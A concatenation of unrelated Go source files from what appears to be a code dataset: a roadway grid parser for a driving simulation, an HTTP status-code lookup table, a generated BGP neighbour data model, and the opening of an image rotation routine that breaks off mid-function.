if offsetPos.X() < 0 || offsetPos.Y() < 0 || offsetPos.X() > float32(GetGridSize()*len(r.roadElements)) || offsetPos.Y() > float32(GetGridSize()*len(r.roadElements[0])) {
return false
}
gridIdx := getGridIdx(offsetPos)
offsetPos = getGridRelativePos(gridIdx, offsetPos)
return r.roadElements[gridIdx.X()][gridIdx.Y()].InBounds(offsetPos)
}
func (r *Roadway) GetRoadElementIdx(position mgl32.Vec2) commonMath.IntVec2 {
offsetPos := getOffsetPosition(position)
return getGridIdx(offsetPos)
}
func (r *Roadway) InAllBounds(positions []mgl32.Vec2) bool {
for _, position := range positions {
if !r.InBounds(position) {
return false
}
}
return true
}
// Given positions and directions, gets the distance and normal of each intersection.
func (r *Roadway) GetBoundaries(positions []mgl32.Vec2, directions []mgl32.Vec2) ([]float32, []mgl32.Vec2) {
boundaryLengths := make([]float32, len(positions))
normals := make([]mgl32.Vec2, len(positions))
for i, position := range positions {
if !r.InBounds(position) {
boundaryLengths[i] = 0.0
}
offsetPosition := getOffsetPosition(position)
vector := geometry.NewVector(offsetPosition, directions[i])
// Brute-force find the closest intersection by looking at the *entire* roadway
hasIntersection := false
minIntersectionDist := float32(math.MaxFloat32)
minNormal := mgl32.Vec2{0, 0}
for _, intersectable := range r.roadParts {
if intersects, intersectionPoint, intersectionNormal := intersectable.Intersects(vector); intersects {
realPos := getRealPosition(intersectionPoint)
intersectionLen := realPos.Sub(position).Len()
if intersectionLen < minIntersectionDist {
minIntersectionDist = intersectionLen
minNormal = intersectionNormal
hasIntersection = true
}
}
}
if hasIntersection {
boundaryLengths[i] = minIntersectionDist
normals[i] = minNormal
} else {
boundaryLengths[i] = 10000.0 // External bounding box
normals[i] = mgl32.Vec2{1, 0}
}
}
return boundaryLengths, normals
}
// Defines the 2D bounds of road elements
func GetGridSize() int {
return config.Config.Simulation.RoadwaySize
}
func ParseInt(item string) int {
i, err := strconv.ParseInt(item, 10, 32)
if err != nil {
panic(err)
}
return int(i)
}
func ParseRoadType(item string) RoadType {
roadType := ParseInt(item)
if roadType < 0 || roadType >= int(MaxRoadType) {
panic(fmt.Sprintf("Did not parse a road type, parsed %v instead.", roadType))
}
return RoadType(roadType)
}
func NewRoadway(fileName string) *Roadway {
newlineSplitFunction := func(c rune) bool {
return c == '\n' || c == '\r'
}
spaceSplitFunction := func(c rune) bool {
return c == ' ' || c == '\t'
}
file := commonIo.ReadFile(fileName)
lines := strings.FieldsFunc(file, newlineSplitFunction)
if len(lines) < 3 {
panic("Expected at least three lines in the file, not enough found.")
}
fmt.Printf("Roadway information: %v\n", lines[0])
// The roadway format corresponds to what you see when you edit it.
// The first line can be a comment. No other comments are allowed.
// *empty* newlines are allowed anywhere in the format
// Line 1: xSize
// Line 2: ySize
xSize := ParseInt(lines[1])
ySize := ParseInt(lines[2])
fmt.Printf("Started parsing a roadway grid of size [%v, %v]\n", xSize, ySize)
// Remaining lines: Y lines, flipped upside down to match the screen display
// Any number of spaces or tabs can be used for item delimiters
// Items are defined as RoadType:OptionalValue
if len(lines) < 3+ySize {
panic(fmt.Sprintf("Did not find enough lines to parse the full roadway grid, Found %v, expected %v", len(lines), ySize+3))
}
roadway := Roadway{roadElements: make([][]Road, xSize)}
for i, _ := range roadway.roadElements {
roadway.roadElements[i] = make([]Road, ySize)
}
for j, line := range lines[3:] {
roadParts := strings.FieldsFunc(line, spaceSplitFunction)
if len(roadParts) != xSize {
panic(fmt.Sprintf("Found %v road elements, expected %v", len(roadParts), xSize))
}
for i, part := range roadParts {
subParts := strings.Split(part, ":")
roadType := ParseRoadType(subParts[0])
optionalData := 0 // Default if the item takes in optional data but does not use it.
if len(subParts) > 1 {
// We have optional data. Create it
optionalData = ParseInt(subParts[1])
}
newRoad := newRoad(roadType, optionalData)
roadway.roadElements[xSize-(i+1)][j] = newRoad
roadway.roadParts = append(roadway.roadParts, newRoad.GetBounds(commonMath.IntVec2{xSize - (i + 1), j})...)
}
}
fmt.Printf("Roadway size: [%v, %v]\n\n", len(roadway.roadElements), len(roadway.roadElements[0]))
return &roadway
} | voxelli/roadway/roadway.go | 0.784608 | 0.544741 | roadway.go | starcoder |
package main
import (
"errors"
)
var (
corpus = map[int]*httpcode{
100: {
100,
"Continue",
"This interim response indicates that everything so far is OK and that the client should continue the request, or ignore the response if the request is already finished.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/100",
},
101: {
101,
"Switching Protocols",
"This code is sent in response to an Upgrade request header from the client, and indicates the protocol the server is switching to.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/101",
},
102: {
102,
"Processing",
"This code indicates that the server has received and is processing the request, but no response is available yet.",
"",
},
103: {
103,
"Early Hints",
"This status code is primarily intended to be used with the Link header, letting the user agent start preloading resources while the server prepares a response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/103",
},
200: {
200,
"OK",
`The request has succeeded. The meaning of the success depends on the HTTP method:
GET: The resource has been fetched and is transmitted in the message body.
HEAD: The entity headers are in the message body.
PUT or POST: The resource describing the result of the action is transmitted in the message body.
TRACE: The message body contains the request message as received by the server.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200",
},
201: {
201,
"Created",
"The request has succeeded and a new resource has been created as a result. This is typically the response sent after POST requests, or some PUT requests.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/201",
},
202: {
202,
"Accepted",
"The request has been received but not yet acted upon. It is noncommittal, since there is no way in HTTP to later send an asynchronous response indicating the outcome of the request. It is intended for cases where another process or server handles the request, or for batch processing.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/202",
},
203: {
203,
"Non-Authoritative Information",
`This response code means the returned meta-information is not exactly the same as is available from the origin server, but is collected from a local or a third-party copy. This is mostly used for mirrors or backups of another resource. Except for that specific case, the "200 OK" response is preferred to this status.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/203",
},
204: {
204,
"No Content",
"There is no content to send for this request, but the headers may be useful. The user-agent may update its cached headers for this resource with the new ones.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/204",
},
205: {
205,
"Reset Content",
"Tells the user-agent to reset the document which sent this request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/205",
},
206: {
206,
"Partial Content",
"This response code is used when the Range header is sent from the client to request only part of a resource.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/206",
},
207: {
207,
"Multi-Status",
"Conveys information about multiple resources, for situations where multiple status codes might be appropriate.",
"",
},
208: {
208,
"Already Reported",
"Used inside a <dav:propstat> response element to avoid repeatedly enumerating the internal members of multiple bindings to the same collection.",
"",
},
226: {
226,
"IM Used",
"The server has fulfilled a GET request for the resource, and the response is a representation of the result of one or more instance-manipulations applied to the current instance.",
"",
},
300: {
300,
"Multiple Choice",
"The request has more than one possible response. The user-agent or user should choose one of them. (There is no standardized way of choosing one of the responses, but HTML links to the possibilities are recommended so the user can pick.)",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/300",
},
301: {
301,
"Moved Permanently",
"The URL of the requested resource has been changed permanently. The new URL is given in the response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/301",
},
302: {
302,
"Found",
"This response code means that the URI of requested resource has been changed temporarily. Further changes in the URI might be made in the future. Therefore, this same URI should be used by the client in future requests.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/302",
},
303: {
303,
"See Other",
"The server sent this response to direct the client to get the requested resource at another URI with a GET request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/303",
},
304: {
304,
"Not Modified",
"This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/304",
},
305: {
305,
"Use Proxy",
"Defined in a previous version of the HTTP specification to indicate that a requested response must be accessed by a proxy. It has been deprecated due to security concerns regarding in-band configuration of a proxy.",
"",
},
306: {
306,
"unused",
"This response code is no longer used; it is just reserved. It was used in a previous version of the HTTP/1.1 specification.",
"",
},
307: {
307,
"Temporary Redirect",
"The server sends this response to direct the client to get the requested resource at another URI with same method that was used in the prior request. This has the same semantics as the 302 Found HTTP response code, with the exception that the user agent must not change the HTTP method used: If a POST was used in the first request, a POST must be used in the second request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307",
},
308: {
308,
"Permanent Redirect",
"This means that the resource is now permanently located at another URI, specified by the Location: HTTP Response header. This has the same semantics as the 301 Moved Permanently HTTP response code, with the exception that the user agent must not change the HTTP method used: If a POST was used in the first request, a POST must be used in the second request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308",
},
400: {
400,
"Bad Request",
"The server could not understand the request due to invalid syntax.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/400",
},
401: {
401,
"Unauthorized",
`Although the HTTP standard specifies "unauthorized", semantically this response means "unauthenticated". That is, the client must authenticate itself to get the requested response.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/401",
},
402: {
402,
"Payment Required",
"This response code is reserved for future use. The initial aim for creating this code was using it for digital payment systems, however this status code is used very rarely and no standard convention exists.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/402",
},
403: {
403,
"Forbidden",
"The client does not have access rights to the content; that is, it is unauthorized, so the server is refusing to give the requested resource. Unlike 401, the client's identity is known to the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403",
},
404: {
404,
"Not Found",
"The server can not find the requested resource. In the browser, this means the URL is not recognized. In an API, this can also mean that the endpoint is valid but the resource itself does not exist. Servers may also send this response instead of 403 to hide the existence of a resource from an unauthorized client. This response code is probably the most famous one due to its frequent occurrence on the web.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/404",
},
405: {
405,
"Method Not Allowed",
"The request method is known by the server but has been disabled and cannot be used. For example, an API may forbid DELETE-ing a resource. The two mandatory methods, GET and HEAD, must never be disabled and should not return this error code.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/405",
},
406: {
406,
"Not Acceptable",
"This response is sent when the web server, after performing server-driven content negotiation, doesn't find any content that conforms to the criteria given by the user agent.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/406",
},
407: {
407,
"Proxy Authentication Required",
"This is similar to 401 but authentication is needed to be done by a proxy.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/407",
},
408: {
408,
"Request Timeout",
"This response is sent on an idle connection by some servers, even without any previous request by the client. It means that the server would like to shut down this unused connection. This response is used much more since some browsers, like Chrome, Firefox 27+, or IE9, use HTTP pre-connection mechanisms to speed up surfing. Also note that some servers merely shut down the connection without sending this message.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/408",
},
409: {
409,
"Conflict",
"This response is sent when a request conflicts with the current state of the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/409",
},
410: {
410,
"Gone",
`This response is sent when the requested content has been permanently deleted from server, with no forwarding address. Clients are expected to remove their caches and links to the resource. The HTTP specification intends this status code to be used for "limited-time, promotional services". APIs should not feel compelled to indicate resources that have been deleted with this status code.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/410",
},
411: {
411,
"Length Required",
"Server rejected the request because the Content-Length header field is not defined and the server requires it.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/411",
},
412: {
412,
"Precondition Failed",
"The client has indicated preconditions in its headers which the server does not meet.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/412",
},
413: {
413,
"Payload Too Large",
"Request entity is larger than limits defined by server; the server might close the connection or return an Retry-After header field.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/413",
},
414: {
414,
"URI Too Long",
"The URI requested by the client is longer than the server is willing to interpret.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/414",
},
415: {
415,
"Unsupported Media Type",
"The media format of the requested data is not supported by the server, so the server is rejecting the request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/415",
},
416: {
416,
"Range Not Satisfiable",
"The range specified by the Range header field in the request can't be fulfilled; it's possible that the range is outside the size of the target URI's data.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/416",
},
417: {
417,
"Expectation Failed",
"This response code means the expectation indicated by the Expect request header field can't be met by the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/417",
},
418: {
418,
"I'm a teapot",
"The server refuses the attempt to brew coffee with a teapot.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/418",
},
421: {
421,
"Misdirected Request",
"The request was directed at a server that is not able to produce a response. This can be sent by a server that is not configured to produce responses for the combination of scheme and authority that are included in the request URI.",
"",
},
422: {
422,
"Unprocessable Entity",
"The request was well-formed but was unable to be followed due to semantic errors.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/422",
},
423: {
423,
"Locked",
"The resource that is being accessed is locked.",
"",
},
424: {
424,
"Failed Dependency",
"The request failed due to failure of a previous request.",
"",
},
425: {
425,
"Too Early",
"Indicates that the server is unwilling to risk processing a request that might be replayed.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/425",
},
426: {
426,
"Upgrade Required",
"The server refuses to perform the request using the current protocol but might be willing to do so after the client upgrades to a different protocol. The server sends an Upgrade header in a 426 response to indicate the required protocol(s).",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/426",
},
428: {
428,
"Precondition Required",
"The origin server requires the request to be conditional. This response is intended to prevent the 'lost update' problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/428",
},
429: {
429,
"Too Many Requests",
`The user has sent too many requests in a given amount of time ("rate limiting").`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/429",
},
431: {
431,
"Request Header Fields Too Large",
"The server is unwilling to process the request because its header fields are too large. The request may be resubmitted after reducing the size of the request header fields.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/431",
},
451: {
451,
"Unavailable For Legal Reasons",
"The user-agent requested a resource that cannot legally be provided, such as a web page censored by a government.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/451",
},
500: {
500,
"Internal Server Error",
"The server has encountered a situation it doesn't know how to handle.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/500",
},
501: {
501,
"Not Implemented",
"The request method is not supported by the server and cannot be handled. The only methods that servers are required to support (and therefore that must not return this code) are GET and HEAD.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/501",
},
502: {
502,
"Bad Gateway",
"This error response means that the server, while working as a gateway to get a response needed to handle the request, got an invalid response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/502",
},
503: {
503,
"Service Unavailable",
"The server is not ready to handle the request. Common causes are a server that is down for maintenance or that is overloaded. Note that together with this response, a user-friendly page explaining the problem should be sent. This responses should be used for temporary conditions and the Retry-After: HTTP header should, if possible, contain the estimated time before the recovery of the service. The webmaster must also take care about the caching-related headers that are sent along with this response, as these temporary condition responses should usually not be cached.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/503",
},
504: {
504,
"Gateway Timeout",
"This error response is given when the server is acting as a gateway and cannot get a response in time.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/504",
},
505: {
505,
"HTTP Version Not Supported",
"The HTTP version used in the request is not supported by the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/505",
},
506: {
506,
"Variant Also Negotiates",
"The server has an internal configuration error: the chosen variant resource is configured to engage in transparent content negotiation itself, and is therefore not a proper end point in the negotiation process.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/506",
},
507: {
507,
"Insufficient Storage",
"The method could not be performed on the resource because the server is unable to store the representation needed to successfully complete the request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/507",
},
508: {
508,
"Loop Detected",
"The server detected an infinite loop while processing the request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/508",
},
510: {
510,
"Not Extended",
"Further extensions to the request are required for the server to fulfil it.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/510",
},
511: {
511,
"Network Authentication Required",
"The 511 status code indicates that the client needs to authenticate to gain network access.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/511",
},
}
)
var errCodeNotFound = errors.New("code not found")
func getDetails(code int) (*httpcode, error) {
httpCode, ok := corpus[code]
if !ok {
return nil, errCodeNotFound
}
return httpCode, nil
}
func getReasonPhrase(code int) (string, error) {
httpCode, err := getDetails(code)
if err != nil {
return "", err
}
return httpCode.reasonPhrase, nil
} | corpus.go | 0.65202 | 0.405949 | corpus.go | starcoder |
package v1
import (
"encoding/json"
)
// BgpNeighborData struct for BgpNeighborData
type BgpNeighborData struct {
// Address Family for IP Address. Accepted values are 4 or 6
AddressFamily *float32 `json:"address_family,omitempty"`
// The customer's ASN. In a local BGP deployment, this will be an internal ASN used to route within the data center. For a global BGP deployment, this will be the your own ASN, configured when you set up BGP for your project.
CustomerAs *float32 `json:"customer_as,omitempty"`
// The device's IP address. For an IPv4 BGP session, this is typically the private bond0 address for the device.
CustomerIp *string `json:"customer_ip,omitempty"`
// True if an MD5 password is configured for the project.
Md5Enabled *bool `json:"md5_enabled,omitempty"`
// The MD5 password configured for the project, if set.
Md5Password *string `json:"md5_password,omitempty"`
// True when the BGP session should be configured as multihop.
Multihop *bool `json:"multihop,omitempty"`
// The Peer ASN to use when configuring BGP on your device.
PeerAs *float32 `json:"peer_as,omitempty"`
// A list of one or more IP addresses to use for the Peer IP section of your BGP configuration. For non-multihop sessions, this will typically be a single gateway address for the device. For multihop sessions, it will be a list of IPs.
PeerIps *[]string `json:"peer_ips,omitempty"`
// A list of project subnets
RoutesIn *[]BgpNeighborDataRoutesIn `json:"routes_in,omitempty"`
// A list of outgoing routes. Only populated if the BGP session has default route enabled.
RoutesOut *[]BgpNeighborDataRoutesOut `json:"routes_out,omitempty"`
}
// NewBgpNeighborData instantiates a new BgpNeighborData object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewBgpNeighborData() *BgpNeighborData {
this := BgpNeighborData{}
return &this
}
// NewBgpNeighborDataWithDefaults instantiates a new BgpNeighborData object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
func NewBgpNeighborDataWithDefaults() *BgpNeighborData {
this := BgpNeighborData{}
return &this
}
// GetAddressFamily returns the AddressFamily field value if set, zero value otherwise.
func (o *BgpNeighborData) GetAddressFamily() float32 {
if o == nil || o.AddressFamily == nil {
var ret float32
return ret
}
return *o.AddressFamily
}
// GetAddressFamilyOk returns a tuple with the AddressFamily field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetAddressFamilyOk() (*float32, bool) {
if o == nil || o.AddressFamily == nil {
return nil, false
}
return o.AddressFamily, true
}
// HasAddressFamily returns a boolean if a field has been set.
func (o *BgpNeighborData) HasAddressFamily() bool {
if o != nil && o.AddressFamily != nil {
return true
}
return false
}
// SetAddressFamily gets a reference to the given float32 and assigns it to the AddressFamily field.
func (o *BgpNeighborData) SetAddressFamily(v float32) {
o.AddressFamily = &v
}
// GetCustomerAs returns the CustomerAs field value if set, zero value otherwise.
func (o *BgpNeighborData) GetCustomerAs() float32 {
if o == nil || o.CustomerAs == nil {
var ret float32
return ret
}
return *o.CustomerAs
}
// GetCustomerAsOk returns a tuple with the CustomerAs field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetCustomerAsOk() (*float32, bool) {
if o == nil || o.CustomerAs == nil {
return nil, false
}
return o.CustomerAs, true
}
// HasCustomerAs returns a boolean if a field has been set.
func (o *BgpNeighborData) HasCustomerAs() bool {
if o != nil && o.CustomerAs != nil {
return true
}
return false
}
// SetCustomerAs gets a reference to the given float32 and assigns it to the CustomerAs field.
func (o *BgpNeighborData) SetCustomerAs(v float32) {
o.CustomerAs = &v
}
// GetCustomerIp returns the CustomerIp field value if set, zero value otherwise.
func (o *BgpNeighborData) GetCustomerIp() string {
if o == nil || o.CustomerIp == nil {
var ret string
return ret
}
return *o.CustomerIp
}
// GetCustomerIpOk returns a tuple with the CustomerIp field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetCustomerIpOk() (*string, bool) {
if o == nil || o.CustomerIp == nil {
return nil, false
}
return o.CustomerIp, true
}
// HasCustomerIp returns a boolean if a field has been set.
func (o *BgpNeighborData) HasCustomerIp() bool {
if o != nil && o.CustomerIp != nil {
return true
}
return false
}
// SetCustomerIp gets a reference to the given string and assigns it to the CustomerIp field.
func (o *BgpNeighborData) SetCustomerIp(v string) {
o.CustomerIp = &v
}
// GetMd5Enabled returns the Md5Enabled field value if set, zero value otherwise.
func (o *BgpNeighborData) GetMd5Enabled() bool {
if o == nil || o.Md5Enabled == nil {
var ret bool
return ret
}
return *o.Md5Enabled
}
// GetMd5EnabledOk returns a tuple with the Md5Enabled field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetMd5EnabledOk() (*bool, bool) {
if o == nil || o.Md5Enabled == nil {
return nil, false
}
return o.Md5Enabled, true
}
// HasMd5Enabled returns a boolean if a field has been set.
func (o *BgpNeighborData) HasMd5Enabled() bool {
if o != nil && o.Md5Enabled != nil {
return true
}
return false
}
// SetMd5Enabled gets a reference to the given bool and assigns it to the Md5Enabled field.
func (o *BgpNeighborData) SetMd5Enabled(v bool) {
o.Md5Enabled = &v
}
// GetMd5Password returns the Md5Password field value if set, zero value otherwise.
func (o *BgpNeighborData) GetMd5Password() string {
if o == nil || o.Md5Password == nil {
var ret string
return ret
}
return *o.Md5Password
}
// GetMd5PasswordOk returns a tuple with the Md5Password field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetMd5PasswordOk() (*string, bool) {
if o == nil || o.Md5Password == nil {
return nil, false
}
return o.Md5Password, true
}
// HasMd5Password returns a boolean if a field has been set.
func (o *BgpNeighborData) HasMd5Password() bool {
if o != nil && o.Md5Password != nil {
return true
}
return false
}
// SetMd5Password gets a reference to the given string and assigns it to the Md5Password field.
func (o *BgpNeighborData) SetMd5Password(v string) {
o.Md5Password = &v
}
// GetMultihop returns the Multihop field value if set, zero value otherwise.
func (o *BgpNeighborData) GetMultihop() bool {
if o == nil || o.Multihop == nil {
var ret bool
return ret
}
return *o.Multihop
}
// GetMultihopOk returns a tuple with the Multihop field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetMultihopOk() (*bool, bool) {
if o == nil || o.Multihop == nil {
return nil, false
}
return o.Multihop, true
}
// HasMultihop returns a boolean if a field has been set.
func (o *BgpNeighborData) HasMultihop() bool {
if o != nil && o.Multihop != nil {
return true
}
return false
}
// SetMultihop gets a reference to the given bool and assigns it to the Multihop field.
func (o *BgpNeighborData) SetMultihop(v bool) {
o.Multihop = &v
}
// GetPeerAs returns the PeerAs field value if set, zero value otherwise.
func (o *BgpNeighborData) GetPeerAs() float32 {
if o == nil || o.PeerAs == nil {
var ret float32
return ret
}
return *o.PeerAs
}
// GetPeerAsOk returns a tuple with the PeerAs field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetPeerAsOk() (*float32, bool) {
if o == nil || o.PeerAs == nil {
return nil, false
}
return o.PeerAs, true
}
// HasPeerAs returns a boolean if a field has been set.
func (o *BgpNeighborData) HasPeerAs() bool {
if o != nil && o.PeerAs != nil {
return true
}
return false
}
// SetPeerAs gets a reference to the given float32 and assigns it to the PeerAs field.
func (o *BgpNeighborData) SetPeerAs(v float32) {
o.PeerAs = &v
}
// GetPeerIps returns the PeerIps field value if set, zero value otherwise.
func (o *BgpNeighborData) GetPeerIps() []string {
if o == nil || o.PeerIps == nil {
var ret []string
return ret
}
return *o.PeerIps
}
// GetPeerIpsOk returns a tuple with the PeerIps field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetPeerIpsOk() (*[]string, bool) {
if o == nil || o.PeerIps == nil {
return nil, false
}
return o.PeerIps, true
}
// HasPeerIps returns a boolean if a field has been set.
func (o *BgpNeighborData) HasPeerIps() bool {
if o != nil && o.PeerIps != nil {
return true
}
return false
}
// SetPeerIps gets a reference to the given []string and assigns it to the PeerIps field.
func (o *BgpNeighborData) SetPeerIps(v []string) {
o.PeerIps = &v
}
// GetRoutesIn returns the RoutesIn field value if set, zero value otherwise.
func (o *BgpNeighborData) GetRoutesIn() []BgpNeighborDataRoutesIn {
if o == nil || o.RoutesIn == nil {
var ret []BgpNeighborDataRoutesIn
return ret
}
return *o.RoutesIn
}
// GetRoutesInOk returns a tuple with the RoutesIn field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetRoutesInOk() (*[]BgpNeighborDataRoutesIn, bool) {
if o == nil || o.RoutesIn == nil {
return nil, false
}
return o.RoutesIn, true
}
// HasRoutesIn returns a boolean if a field has been set.
func (o *BgpNeighborData) HasRoutesIn() bool {
if o != nil && o.RoutesIn != nil {
return true
}
return false
}
// SetRoutesIn gets a reference to the given []BgpNeighborDataRoutesIn and assigns it to the RoutesIn field.
func (o *BgpNeighborData) SetRoutesIn(v []BgpNeighborDataRoutesIn) {
o.RoutesIn = &v
}
// GetRoutesOut returns the RoutesOut field value if set, zero value otherwise.
func (o *BgpNeighborData) GetRoutesOut() []BgpNeighborDataRoutesOut {
if o == nil || o.RoutesOut == nil {
var ret []BgpNeighborDataRoutesOut
return ret
}
return *o.RoutesOut
}
// GetRoutesOutOk returns a tuple with the RoutesOut field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetRoutesOutOk() (*[]BgpNeighborDataRoutesOut, bool) {
if o == nil || o.RoutesOut == nil {
return nil, false
}
return o.RoutesOut, true
}
// HasRoutesOut returns a boolean if a field has been set.
func (o *BgpNeighborData) HasRoutesOut() bool {
if o != nil && o.RoutesOut != nil {
return true
}
return false
}
// SetRoutesOut gets a reference to the given []BgpNeighborDataRoutesOut and assigns it to the RoutesOut field.
func (o *BgpNeighborData) SetRoutesOut(v []BgpNeighborDataRoutesOut) {
o.RoutesOut = &v
}
func (o BgpNeighborData) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
if o.AddressFamily != nil {
toSerialize["address_family"] = o.AddressFamily
}
if o.CustomerAs != nil {
toSerialize["customer_as"] = o.CustomerAs
}
if o.CustomerIp != nil {
toSerialize["customer_ip"] = o.CustomerIp
}
if o.Md5Enabled != nil {
toSerialize["md5_enabled"] = o.Md5Enabled
}
if o.Md5Password != nil {
toSerialize["md5_password"] = o.Md5Password
}
if o.Multihop != nil {
toSerialize["multihop"] = o.Multihop
}
if o.PeerAs != nil {
toSerialize["peer_as"] = o.PeerAs
}
if o.PeerIps != nil {
toSerialize["peer_ips"] = o.PeerIps
}
if o.RoutesIn != nil {
toSerialize["routes_in"] = o.RoutesIn
}
if o.RoutesOut != nil {
toSerialize["routes_out"] = o.RoutesOut
}
return json.Marshal(toSerialize)
}
type NullableBgpNeighborData struct {
value *BgpNeighborData
isSet bool
}
func (v NullableBgpNeighborData) Get() *BgpNeighborData {
return v.value
}
func (v *NullableBgpNeighborData) Set(val *BgpNeighborData) {
v.value = val
v.isSet = true
}
func (v NullableBgpNeighborData) IsSet() bool {
return v.isSet
}
func (v *NullableBgpNeighborData) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableBgpNeighborData(val *BgpNeighborData) *NullableBgpNeighborData {
return &NullableBgpNeighborData{value: val, isSet: true}
}
func (v NullableBgpNeighborData) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableBgpNeighborData) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | v1/model_bgp_neighbor_data.go | 0.824144 | 0.426083 | model_bgp_neighbor_data.go | starcoder |
package aips
import (
"image"
"image/color"
"math"
)
func Rotate(src image.Image, ang float64) image.Image {
// 计算旋转后保留完整图像的宽和高
cosA, sinA := math.Cos(-ang), math.Sin(-ang)
srcRect := src.Bounds()
srcWidth := srcRect.Dx()
srcHeight := srcRect.Dy()
dstWidth := int(math.Abs(float64(srcWidth)*cosA - float64(srcHeight)*sinA + 0.5))
dstHeight := int(math.Abs(float64(-srcWidth)*cosA + float64(srcHeight)*sinA + 0.5))
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
// 计算新图片
rx, ry := float64(srcWidth)/2, float64(srcHeight)/2
dx, dy := float64(dstWidth)/2, float64(dstHeight)/2
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
// 反向映射
sx := (float64(x)-dx)*cosA - (float64(y)-dy)*(-sinA) + rx
sy := (float64(x)-dx)*(-sinA) + (float64(y)-dy)*cosA + ry
Lf, Rf, Tf, Bf := math.Floor(sx), math.Ceil(sx), math.Floor(sy), math.Floor(sy)
Li, Ri, Ti, Bi := int(Lf), int(Rf), int(Tf), int(Bf)
r1, g1, b1, a1 := src.At(Li, Ti).RGBA()
r2, g2, b2, a2 := src.At(Ri, Ti).RGBA()
r3, g3, b3, a3 := src.At(Li, Bi).RGBA()
r4, g4, b4, a4 := src.At(Ri, Bi).RGBA()
r1f, g1f, b1f, a1f := float64(r1), float64(g1), float64(b1), float64(a1)
r2f, g2f, b2f, a2f := float64(r2), float64(g2), float64(b2), float64(a2)
r3f, g3f, b3f, a3f := float64(r3), float64(g3), float64(b3), float64(a3)
r4f, g4f, b4f, a4f := float64(r4), float64(g4), float64(b4), float64(a4)
p1 := (1 - sx + Lf) * (1 - sy + Tf)
